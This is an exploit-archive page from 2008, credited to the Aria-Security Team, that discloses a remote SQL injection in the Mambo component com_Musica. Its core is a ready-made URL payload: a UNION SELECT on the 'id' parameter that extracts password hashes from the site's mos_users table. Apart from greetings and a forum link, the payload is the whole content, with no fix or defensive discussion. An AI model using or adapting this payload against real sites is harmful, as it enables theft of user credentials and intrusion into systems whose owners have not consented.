Mambo Component com_Musica (id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component com_Musica (id) Remote SQL Injection Vulnerability
# Published : 2008-03-01
# Author : Aria-Security Team
# Previous Title : Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability
# Next Title : phpArcadeScript <= 3.0RC2 (userid) SQL Injection Vulnerability

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff
Mambo com_Musica "id" Remote SQL Injection


index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*

Original Link:
http://forum.aria-security.net/showthread.php?t=588

Regards,
The-0utl4w

# www.Syue.com [2008-03-01]